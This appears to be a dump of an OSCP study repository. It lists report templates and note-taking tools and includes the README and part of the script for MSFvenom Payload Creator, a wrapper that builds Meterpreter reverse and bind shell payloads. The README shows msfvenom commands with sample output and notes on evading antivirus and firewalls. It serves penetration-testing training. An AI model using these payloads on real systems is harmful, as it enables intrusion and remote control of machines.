├── Exam Report Templates
└── README.md
├── Note Taking Tools
├── CherryTree Template
│ ├── CTF_template.ctb
│ └── README.md
├── Dradis Framework
│ ├── README.md
│ └── dradis-ce_compliance_package-oscp.v0.3.zip
├── Joplin Templates
│ └── README.md
└── README.md
├── Payload Generators
├── MSFVenom Payload Creator
│ ├── LICENSE
│ ├── README.md
│ └── msfpc.sh
└── Rev Shell (Windows)
│ ├── .gitignore
│ ├── .idea
│ ├── encodings.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── rev.iml
│ ├── vcs.xml
│ └── workspace.xml
│ ├── README.md
│ ├── makefile
│ ├── reciever.py
│ └── rev.c
├── README.md
└── Reconnaissance
└── Port-Service Scans
├── README.md
├── smbver.sh
└── udp_scan.pl
/Exam Report Templates/README.md:
--------------------------------------------------------------------------------
1 | # Markdown Templates
2 | * [Noraj OSCP-Exam-Report-Template-Markdown](https://github.com/noraj/OSCP-Exam-Report-Template-Markdown)
3 |
4 | # Microsoft Office/LibreOffice
5 | * [OffSec Official Microsoft Office Template](https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx)
6 | * [OffSec Official LibreOffice Template](https://www.offsec.com/pwk-online/OSCP-Exam-Report.odt)
7 | * [whoisflynn OSCP Exam Report Template](https://github.com/whoisflynn/OSCP-Exam-Report-Template)
8 | *
--------------------------------------------------------------------------------
/Note Taking Tools/CherryTree Template/CTF_template.ctb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devzspy/oscp-certification/5c52b987c745b149552fddb58c43b94d98423db3/Note Taking Tools/CherryTree Template/CTF_template.ctb
--------------------------------------------------------------------------------
/Note Taking Tools/CherryTree Template/README.md:
--------------------------------------------------------------------------------
1 | # CTF_Template
2 | A template created by James Hall ( https://411hall.github.io/OSCP-Preparation/ ) for note taking for CTFs/OSCP
3 |
--------------------------------------------------------------------------------
/Note Taking Tools/Dradis Framework/README.md:
--------------------------------------------------------------------------------
1 | # Dradis Framework
2 | This is the reporting template for the Dradis Framework for the OSCP Certification
3 |
--------------------------------------------------------------------------------
/Note Taking Tools/Dradis Framework/dradis-ce_compliance_package-oscp.v0.3.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/devzspy/oscp-certification/5c52b987c745b149552fddb58c43b94d98423db3/Note Taking Tools/Dradis Framework/dradis-ce_compliance_package-oscp.v0.3.zip
--------------------------------------------------------------------------------
/Note Taking Tools/Joplin Templates/README.md:
--------------------------------------------------------------------------------
1 | * [tjnull's Joplin OSCP Template](https://github.com/tjnull/TJ-JPT)
--------------------------------------------------------------------------------
/Note Taking Tools/README.md:
--------------------------------------------------------------------------------
1 | # Note Taking Tools
2 |
3 | Below is a list of note taking tools one can use. If there is a template or some file required for download, please see the appropriate folder for it. Otherwise, click the links below for whatever tool interests you the most
4 |
5 | ## Frameworks
6 | * [Dradis](https://dradis.com/academy/industry/compliance/oscp/)
7 | * [sysreptor](https://github.com/Syslifters/sysreptor)
8 | * [SimplE RePort wrIting and COllaboration(serpico) tool](https://github.com/SerpicoProject/Serpico) - Archived by author
9 |
10 | ## Applications
11 | * [KeepNote](https://keepnote.org/) - More or less deprecated, use CherryTree
12 | * [CherryTree](https://www.giuspen.net/cherrytree/)
13 | * [Notion](https://www.notion.so/)
14 | * [Joplin](https://joplinapp.org/)
15 | * [Obsidian](https://obsidian.md/)
--------------------------------------------------------------------------------
/Payload Generators/MSFVenom Payload Creator/LICENSE:
--------------------------------------------------------------------------------
1 | The MIT License (MIT)
2 |
3 | Copyright (c) 2015 g0tmi1k
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
23 |
--------------------------------------------------------------------------------
/Payload Generators/MSFVenom Payload Creator/README.md:
--------------------------------------------------------------------------------
1 | Original link: https://github.com/g0tmi1k/msfpc
2 |
3 | ## MSFvenom Payload Creator (MSFPC)
4 |
5 | A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).
6 |
7 |
8 |
9 |
10 |
11 |
12 | - - -
13 |
14 |
15 | ## About
16 |
17 | MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload.
18 |
19 | **Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MSFPC itself)_.
20 | The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands**, **batch payload production** and able to enter **any argument in any order** _(in various formats/patterns)_).
21 |
22 | The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`).
23 |
24 | * **Can't remember your IP for a interface? Don't sweat it, just use the interface name**: `eth0`.
25 | * **Don't know what your external IP is? MSFPC will discover it**: `wan`.
26 | * **Want to generate one of each payload? No issue!** Try: `loop`.
27 | * **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!
28 |
29 | _Note: This will **NOT** try to bypass any anti-virus solutions at any stage._
30 |
31 | 
32 |
33 |
34 | - - -
35 |
36 |
37 | ## Install
38 |
39 | + Designed for **Kali Linux v2.x/Rolling** & **Metasploit v4.11+**.
40 | + Kali v1.x should work.
41 | + OSX 10.11+ should work.
42 | + Weakerth4n 6+ should work.
43 | + _...nothing else has been tested._
44 |
45 | ```
46 | $ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
47 | $ chmod 0755 /usr/local/bin/msfpc
48 | ```
49 |
50 | ### Kali-Linux
51 |
52 | MSFPC is already [packaged](https://pkg.kali.org/pkg/msfpc) in [Kali Rolling](https://www.kali.org/), so all you have to-do is:
53 |
54 | ```bash
55 | root@kali:~# apt install -y msfpc
56 | ```
57 |
58 |
59 |
60 | - - -
61 |
62 |
63 | ## Help
64 |
65 | ```
66 | $ bash msfpc.sh -h -v
67 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
68 |
69 | msfpc.sh () () () () () () () ()
70 | Example: msfpc.sh windows 192.168.1.10 # Windows & manual IP.
71 | msfpc.sh elf bind eth0 4444 # Linux, eth0's IP & manual port.
72 | msfpc.sh stageless cmd py https # Python, stageless command prompt.
73 | msfpc.sh verbose loop eth1 # A payload for every type, using eth1's IP.
74 | msfpc.sh msf batch wan # All possible Meterpreter payloads, using WAN IP.
75 | msfpc.sh help verbose # Help screen, with even more information.
76 |
77 | :
78 | + APK
79 | + ASP
80 | + ASPX
81 | + Bash [.sh]
82 | + Java [.jsp]
83 | + Linux [.elf]
84 | + OSX [.macho]
85 | + Perl [.pl]
86 | + PHP
87 | + Powershell [.ps1]
88 | + Python [.py]
89 | + Tomcat [.war]
90 | + Windows [.exe // .dll]
91 |
92 | Rather than putting , you can do a interface and MSFPC will detect that IP address.
93 | Missing will default to the IP menu.
94 |
95 | Missing will default to 443.
96 |
97 | is a standard/native command prompt/terminal to interactive with.
98 | is a custom cross platform shell, gaining the full power of Metasploit.
99 | Missing will default to where possible.
100 | Note: Metasploit doesn't (yet!) support for every format.
101 | payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support.
102 | payloads are generally much larger than , as it comes with more features.
103 |
104 | opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
105 | makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
106 | Missing will default to .
107 | allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access.
108 |
109 | splits the payload into parts, making it smaller but dependent on Metasploit.
110 | is the complete standalone payload. More 'stable' than .
111 | Missing will default to where possible.
112 | Note: Metasploit doesn't (yet!) support for every format.
113 | are 'better' in low-bandwidth/high-latency environments.
114 | are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS.
115 | More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
116 | https://www.offensive-security.com/metasploit-unleashed/payload-types/
117 | https://www.offensive-security.com/metasploit-unleashed/payloads/
118 |
119 | is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
120 | makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
121 | makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
122 | will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on .
123 | Missing will default to .
124 | By altering the traffic, such as and even more , it will slow down the communication & increase the payload size.
125 | More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication
126 |
127 | will generate as many combinations as possible: , , , &
128 | will just create one of each .
129 |
130 | will display more information.
131 | $
132 | ```
133 |
134 |
135 | ## Example \#1 (Windows, Fully Automated Using Manual IP)
136 |
137 | ```bash
138 | $ bash msfpc.sh windows 192.168.1.10
139 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
140 | [i] IP: 192.168.1.10
141 | [i] PORT: 443
142 | [i] TYPE: windows (windows/meterpreter/reverse_tcp)
143 | [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
144 | --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
145 | > '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
146 |
147 | [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
148 |
149 | [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
150 | [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
151 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
152 | [*] Done!
153 | $
154 | ```
155 |
156 |
157 | ## Example \#2 (Linux Format, Fully Automated Using Manual Interface and Port)
158 |
159 | ```bash
160 | $ ./msfpc.sh elf bind eth0 4444 verbose
161 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
162 | [i] IP: 192.168.103.142
163 | [i] PORT: 4444
164 | [i] TYPE: linux (linux/x86/shell/bind_tcp)
165 | [i] SHELL: shell
166 | [i] DIRECTION: bind
167 | [i] STAGE: staged
168 | [i] METHOD: tcp
169 | [i] CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
170 | --platform linux -a x86 -e generic/none LPORT=4444 \
171 | > '/root/linux-shell-staged-bind-tcp-4444.elf'
172 |
173 | [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'
174 |
175 | [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
176 | [i] Size: 4.0K
177 | [i] MD5: eed4623b765eea623f2e0206b63aad61
178 | [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185
179 |
180 | [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
181 | [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
182 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
183 | [*] Done!
184 | $
185 | ```
186 |
187 |
188 | ## Example \#3 (Python Format, Interactive IP Menu)
189 |
190 | ```bash
191 | $ msfpc stageless cmd py tcp
192 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
193 |
194 | [i] Use which interface - IP address?:
195 | [i] 1.) eth0 - 192.168.103.142
196 | [i] 2.) lo - 127.0.0.1
197 | [i] 3.) wan - 31.204.154.174
198 | [?] Select 1-3, interface or IP address: 1
199 |
200 | [i] IP: 192.168.103.142
201 | [i] PORT: 443
202 | [i] TYPE: python (python/shell_reverse_tcp)
203 | [i] CMD: msfvenom -p python/shell_reverse_tcp -f raw \
204 | --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
205 | > '/root/python-shell-stageless-reverse-tcp-443.py'
206 |
207 | [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
208 |
209 | [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
210 | [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
211 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
212 | [*] Done!
213 | $
214 | ```
215 |
216 | _Note: Removed WAN IP._
217 |
218 |
219 | ## Example \#4 (Loop - Generates one of everything)
220 |
221 | ```bash
222 | $ ./msfpc.sh loop wan
223 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
224 | [i] Loop Mode. Creating one of each TYPE, with default values
225 |
226 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
227 | [i] IP: xxx.xxx.xxx.xxx
228 | [i] PORT: 443
229 | [i] TYPE: android (android/meterpreter/reverse_tcp)
230 | [i] CMD: msfvenom -p android/meterpreter/reverse_tcp \
231 | LHOST=xxx.xxx.xxx.xxx LPORT=443 \
232 | > '/root/android-meterpreter-stageless-reverse-tcp-443.apk'
233 |
234 | [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'
235 |
236 | [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
237 | [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
238 | [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
239 | [*] Done!
240 |
241 |
242 | [*] MSFvenom Payload Creator (MSFPC v1.4.4)
243 |
244 | ...SNIP...
245 |
246 | [*] Done!
247 |
248 | $
249 | ```
250 |
251 | _Note: Removed WAN IP._
252 |
253 |
254 | 
255 |
256 |
257 | - - -
258 |
259 |
260 | ## To-Do List
261 |
262 | * Shellcode generation
263 | * x64 payloads
264 | * IPv6 support
265 | * Look into using OS scripting more _(`powershell_bind_tcp` & `bind_perl` etc)_
266 |
--------------------------------------------------------------------------------
/Payload Generators/MSFVenom Payload Creator/msfpc.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #-Metadata----------------------------------------------------#
3 | # Filename: msfpc.sh (v1.4.5) (Update: 2019-02-18) #
4 | #-Info--------------------------------------------------------#
5 | # Quickly generate Metasploit payloads using msfvenom. #
6 | #-Author(s)---------------------------------------------------#
7 | # g0tmilk ~ https://blog.g0tmi1k.com/ #
8 | #-Operating System--------------------------------------------#
9 | # Designed for & tested on: Kali Rolling & Metasploit v4.11+ #
10 | # Reported working: OSX 10.11+ & Kali Linux 1.x/2.x #
11 | #-Licence-----------------------------------------------------#
12 | # MIT License ~ http://opensource.org/licenses/MIT #
13 | #-Notes-------------------------------------------------------#
14 | # Requires: #
15 | # Metasploit Framework v4.11.3-2015062101 or higher #
16 | # --- #
17 | # Useful Manual Commands: #
18 | # msfvenom --list payloads #
19 | # msfvenom --list encoders #
20 | # msfvenom --help-formats #
21 | # --- #
22 | # Reminder about payload names: #
23 | # shell_bind_tcp - Single / Inline / NonStaged / Stageless #
24 | # shell/bind_tcp - Staged (Requires Metasploit) #
25 | #-Known Bugs--------------------------------------------------#
26 | # [BATCH/LOOP] The script must have the executable flag set #
27 | # [BATCH] Will not generate DLL files #
28 | #-------------------------------------------------------------#
29 |
30 | #--Quick Install----------------------------------------------#
31 | # curl -k -L "https://raw.githubusercontent.com/g0tmi1k/msfpc/master/msfpc.sh" > /usr/bin/msfpc; chmod +x /usr/bin/msfpc
32 | #-------------------------------------------------------------#
33 |
34 | #-More information--------------------------------------------#
35 | # - https://www.offensive-security.com/metasploit-unleashed/payloads/
36 | # - https://www.offensive-security.com/metasploit-unleashed/payload-types/
37 | # - https://www.offensive-security.com/metasploit-unleashed/msfvenom/
38 | # - https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
39 | # - https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom
40 | # - https://community.rapid7.com/community/metasploit/blog/2014/12/09/good-bye-msfpayload-and-msfencode
41 | # - https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
42 | #-------------------------------------------------------------#
43 |
44 |
45 | #-Defaults----------------------------------------------------#
46 |
47 |
48 | ##### Variables
49 | OUTPATH="$( pwd )/" # Others: ./ /tmp/ /var/www/
50 |
51 | ##### (Cosmetic) Colour output
52 | RED="\033[01;31m" # Issues/Errors
53 | GREEN="\033[01;32m" # Success/Asking for Input
54 | YELLOW="\033[01;33m" # Warnings/Information
55 | BLUE="\033[01;34m" # Heading
56 | BOLD="\033[01;01m" # Highlight
57 | RESET="\033[00m" # Normal
58 |
59 | ##### Read command line arguments
60 | TYPE="" #"$( echo ${1} | \tr '[:upper:]' '[:lower:]' )" Defalut: *REQUIRED*
61 | IP="" #"${2}" Defalut: *IP menu*
62 | PORT="" #"${3}" Deafult: 443
63 | SHELL="" # shell // meterpreter Default: meterpreter
64 | DIRECTION="" # reverse // bind Default: reverse
65 | STAGE="" # staged // stageless Default: stageless
66 | METHOD="" # tcp // http // https // find_port Default: tcp
67 | VERBOSE=false
68 |
69 | ##### Default values
70 | SUCCESS=false # Did we successfully create a payload?
71 | DOMAIN=false # IP address or domain name?
72 | BATCH=false # Are we creating multiple payloads (one of each type) ?
73 | LOOP=false # Are we creating multiple payloads (every possible combination)?
74 | HELP=false # Display the help screen?
75 | DARWIN=false # In case of OSX users
76 |
77 | ##### (Optional) Enable debug mode?
78 | #set -x
79 |
80 |
81 | #-Function----------------------------------------------------#
82 |
83 | ## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL DIRECTION STAGE METHOD VERBOSE
84 | function doAction {
85 | TYPE="${1}"
86 | IP="${2}"
87 | PORT="${3}"
88 | PAYLOAD="${4}"
89 | CMD="${5}"
90 | FILEEXT="${6%-service}"
91 | SHELL="${7}"
92 | DIRECTION="${8}"
93 | STAGE="${9}"
94 | METHOD="${10}"
95 | VERBOSE="${11}"
96 |
97 | if [[ -z "${VERBOSE}" ]]; then
98 | echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}: doAction TYPE(${TYPE}) IP(${IP}) PORT(${PORT}) PAYLOAD(${PAYLOAD}) CMD(${CMD}) FILEEXT(${FILEEXT}) SHELL(${SHELL}) DIRECTION(${DIRECTION}) STAGE(${STAGE}) METHOD(${METHOD}) VERBOSE(${VERBOSE})" >&2
99 | exit 2
100 | fi
101 |
102 | FILENAME="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}"
103 | FILEHANDLE="${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}-${FILEEXT}.rc"
104 |
105 | X=" IP"
106 | [[ "${DOMAIN}" == "true" ]] \
107 | && X='NAME'
108 | [[ "${VERBOSE}" == "true" ]] \
109 | && PADDING=' '
110 |
111 | echo -e " ${YELLOW}[i]${RESET}${PADDING} ${X}: ${YELLOW}${IP}${RESET}"
112 | echo -e " ${YELLOW}[i]${RESET}${PADDING} PORT: ${YELLOW}${PORT}${RESET}"
113 | echo -e " ${YELLOW}[i]${RESET}${PADDING} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})"
114 | if [[ "${VERBOSE}" == "true" ]]; then
115 | echo -e " ${YELLOW}[i]${RESET} SHELL: ${YELLOW}${SHELL}${RESET}"
116 | echo -e " ${YELLOW}[i]${RESET} DIRECTION: ${YELLOW}${DIRECTION}${RESET}"
117 | echo -e " ${YELLOW}[i]${RESET} STAGE: ${YELLOW}${STAGE}${RESET}"
118 | echo -e " ${YELLOW}[i]${RESET} METHOD: ${YELLOW}${METHOD}${RESET}"
119 | fi
120 | echo -e " ${YELLOW}[i]${RESET}${PADDING} CMD: ${BOLD}${CMD}${RESET}"
121 | echo ""
122 |
123 | CMD=$( echo $CMD | sed 's/\\\\\n//g' )
124 |
125 | [[ -e "${FILENAME}" ]] \
126 | && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. ${YELLOW}Overwriting...${RESET}" \
127 | && rm -f "${FILENAME}"
128 | eval "${CMD}" 2>/tmp/msfpc.out
129 | [[ ! -s "${FILENAME}" ]] \
130 | && rm -f "${FILENAME}"
131 | if [[ -e "${FILENAME}" ]]; then
132 | echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'"
133 | echo ""
134 | \chmod +x "${FILENAME}"
135 | else
136 | echo ""
137 | \grep -q 'Invalid Payload Selected' /tmp/msfpc.out 2>/dev/null
138 | if [[ "$?" == '0' ]]; then
139 | echo -e "\n ${YELLOW}[i]${RESET} ${RED}Invalid Payload Selected${RESET} (Metasploit doesn't support this) =(" >&2
140 | \rm -f /tmp/msfpc.out
141 | else
142 | echo -e "\n ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET} =(." >&2
143 | echo -e "\n----------------------------------------------------------------------------------------"
144 | [ -e "/usr/share/metasploit-framework/build_rev.txt" ] \
145 | && \cat /usr/share/metasploit-framework/build_rev.txt \
146 | || \msfconsole -v
147 | \uname -a
148 | echo -e "----------------------------------------------------------------------------------------${RED}"
149 | \cat /tmp/msfpc.out
150 | echo -e "${RESET}----------------------------------------------------------------------------------------\n"
151 | fi
152 | exit 2
153 | fi
154 | #\rm -f /tmp/msfpc.out
155 |
156 | if [[ "${VERBOSE}" == "true" ]]; then
157 | echo -e " ${YELLOW}[i]${RESET} File: $( \file -b ${FILENAME} )"
158 | echo -e " ${YELLOW}[i]${RESET} Size: $( \du -h ${FILENAME} | \cut -f1 )"
159 | echo -e " ${YELLOW}[i]${RESET} MD5: $( \openssl md5 ${FILENAME} | \awk '{print $2}' )"
160 | echo -e " ${YELLOW}[i]${RESET} SHA1: $( \openssl sha1 ${FILENAME} | \awk '{print $2}' )"
161 | echo -e ""
162 | fi
163 |
164 | HOST="LHOST"
165 | [[ "${DIRECTION}" == "bind" ]] \
166 | && HOST="RHOST"
167 |
168 | cat < "${FILEHANDLE}"
169 | #
170 | # [Kali]: msfdb start; msfconsole -q -r '${FILEHANDLE}'
171 | #
172 | use exploit/multi/handler
173 | set PAYLOAD ${PAYLOAD}
174 | set ${HOST} ${IP}
175 | set LPORT ${PORT}
176 | set ExitOnSession false
177 | set EnableStageEncoding true
178 | #set AutoRunScript 'post/windows/manage/migrate'
179 | run -j
180 | EOF
181 |
182 | echo -e " ${YELLOW}[i]${RESET} MSF handler file: '${FILEHANDLE}'"
183 | echo -e " ${YELLOW}[i]${RESET} Run: msfconsole -q -r '${FILEHANDLE}'"
184 | #echo -e " ${YELLOW}[i]${RESET} MSF command: msfconsole -x \"use exploit/multi/handler; \\\\\n set PAYLOAD ${PAYLOAD}; \\\\\n set ${HOST} ${IP}; \\\\\n set LPORT ${PORT}; \\\\\n set ExitOnSession false; \\\\\n run -j\""
185 | SUCCESS=true
186 | return
187 | }
188 |
189 | ## doHelp
190 | function doHelp {
191 | echo -e "\n ${BLUE}${0}${RESET} <${BOLD}TYPE${RESET}> (<${BOLD}DOMAIN/IP${RESET}>) (<${BOLD}PORT${RESET}>) (<${BOLD}CMD/MSF${RESET}>) (<${BOLD}BIND/REVERSE${RESET}>) (<${BOLD}STAGED/STAGELESS${RESET}>) (<${BOLD}TCP/HTTP/HTTPS/FIND_PORT${RESET}>) (<${BOLD}BATCH/LOOP${RESET}>) (<${BOLD}VERBOSE${RESET}>)"
192 | echo -e " Example: ${BLUE}${0} windows 192.168.1.10${RESET} # Windows & manual IP."
193 | echo -e " ${BLUE}${0} elf bind eth0 4444${RESET} # Linux, eth0's IP & manual port."
194 | echo -e " ${BLUE}${0} stageless cmd py https${RESET} # Python, stageless command prompt."
195 | echo -e " ${BLUE}${0} verbose loop eth1${RESET} # A payload for every type, using eth1's IP."
196 | echo -e " ${BLUE}${0} msf batch wan${RESET} # All possible Meterpreter payloads, using WAN IP."
197 | echo -e " ${BLUE}${0} help verbose${RESET} # Help screen, with even more information."
198 | echo ""
199 | echo -e " <${BOLD}TYPE${RESET}>:"
200 | echo -e " + ${YELLOW}APK${RESET}"
201 | echo -e " + ${YELLOW}ASP${RESET}"
202 | echo -e " + ${YELLOW}ASPX${RESET}"
203 | echo -e " + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}]"
204 | echo -e " + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}]"
205 | echo -e " + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}]"
206 | echo -e " + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}]"
207 | echo -e " + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}]"
208 | echo -e " + ${YELLOW}PHP${RESET}"
209 | echo -e " + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}]"
210 | echo -e " + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}]"
211 | echo -e " + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}]"
212 | echo -e " + ${YELLOW}Windows${RESET} [.${YELLOW}exe${RESET} // .${YELLOW}exe${RESET} // .${YELLOW}dll${RESET}]"
213 | echo ""
214 | echo -e " Rather than putting , you can do a interface and MSFPC will detect that IP address."
215 | echo -e " Missing will default to the IP menu."
216 | echo ""
217 | echo -e " Missing will default to 443."
218 | echo ""
219 | echo -e " is a standard/native command prompt/terminal to interactive with."
220 | echo -e " is a custom cross platform shell, gaining the full power of Metasploit."
221 | echo -e " Missing will default to where possible."
222 | if [[ "${VERBOSE}" == "true" ]]; then
223 | echo -e " Note: Metasploit doesn't (yet!) support for every format."
224 | echo -e " payloads are generally smaller than and easier to bypass EMET. Limit Metasploit post modules/scripts support."
225 | echo -e " payloads are generally much larger than , as it comes with more features."
226 | fi
227 | echo ""
228 | echo -e " opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target."
229 | echo -e " makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target."
230 | echo -e " Missing will default to ."
231 | [[ "${VERBOSE}" == "true" ]] \
232 | && echo -e " allows for the attacker to connect whenever they wish. needs to the target to be repeatedly connecting back to permanent maintain access."
233 | echo ""
234 | echo -e " splits the payload into parts, making it smaller but dependent on Metasploit."
235 | echo -e " is the complete standalone payload. More 'stable' than ."
236 | echo -e " Missing will default to where possible."
237 | if [[ "${VERBOSE}" == "true" ]]; then
238 | echo -e " Note: Metasploit doesn't (yet!) support for every format."
239 | echo -e " are 'better' in low-bandwidth/high-latency environments."
240 | echo -e " are seen as 'stealthier' when bypassing Anti-Virus protections. may work 'better' with IDS/IPS."
241 | echo -e " More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads"
242 | echo -e " https://www.offensive-security.com/metasploit-unleashed/payload-types/"
243 | echo -e " https://www.offensive-security.com/metasploit-unleashed/payloads/"
244 | fi
245 | echo ""
246 | echo -e " is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs."
247 | echo -e " makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80."
248 | echo -e " makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443."
249 | echo -e " will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on ."
250 | echo -e " Missing will default to ."
251 | if [[ "${VERBOSE}" == "true" ]]; then
252 | echo -e " By altering the traffic, such as and even more , it will slow down the communication & increase the payload size."
253 | echo -e " More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication"
254 | fi
255 | echo ""
256 | echo -e " will generate as many combinations as possible: , , , & "
257 | echo -e " will just create one of each ."
258 | echo ""
259 | echo -e " will display more information."
260 | exit 1
261 | }
262 |
263 |
264 | #-Start-------------------------------------------------------#
265 |
266 |
267 | ## Banner
268 | echo -e " ${BLUE}[*]${RESET} ${BLUE}MSF${RESET}venom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MSFPC${RESET} v${BLUE}1.4.5${RESET})"
269 |
270 |
271 | ## Check system
272 | ## Are we using Linux or OSX?
273 | if [[ "$( \uname )" != "Linux" ]] && [[ "$( \uname )" != "Darwin" ]]; then
274 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}You're not using Unix-like OS${RESET}" >&2
275 | exit 3
276 | elif [[ "$( \uname )" = "Darwin" ]]; then
277 | DARWIN=true
278 | fi
279 |
280 | ## msfvenom installed?
281 | if [[ ! -n "$( \which msfvenom )" ]]; then
282 | echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't find msfvenom${RESET}" >&2
283 | exit 3
284 | fi
285 |
